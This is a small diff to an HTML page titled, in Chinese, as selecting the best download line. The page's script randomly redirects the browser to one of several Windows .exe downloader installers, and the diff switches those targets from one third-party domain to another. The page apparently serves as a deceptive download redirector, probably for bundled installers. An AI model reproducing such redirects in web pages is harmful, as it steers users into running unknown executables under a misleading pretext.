--- a/index.html
+++ b/index.html
@@ -4,12 +4,12 @@
 <title>已为你选择最佳下载线路...</title>
 <script>
 function a(){
-var arr=["http://down.qixiu98.com:83/QXDownloader_1997_71561.exe",
- "http://down.qixiu98.com:83/QXDownloader_1997_71618.exe",
- "http://down.qixiu98.com:83/QXDownloader_1997_71722.exe", 
- "http://down.qixiu98.com:83/QXDownloader_1997_71561.exe",
- "http://down.qixiu98.com:83/QXDownloader_1997_71618.exe", 
- "http://down.qixiu98.com:83/QXDownloader_1997_71722.exe", 
+var arr=["http://down2.videospeedy.com/5126setup_113_21735.exe",
+ "http://down2.videospeedy.com/5126setup_113_22792.exe",
+ "http://down2.videospeedy.com/5126setup_113_21722.exe", 
+ "http://down2.videospeedy.com/5126setup_113_21735.exe",
+ "http://down2.videospeedy.com/5126setup_113_22792.exe", 
+ "http://down2.videospeedy.com/5126setup_113_21722.exe", 
 ];
 var n=parseInt(Math.random()*6);
 window.location.href=arr[n];
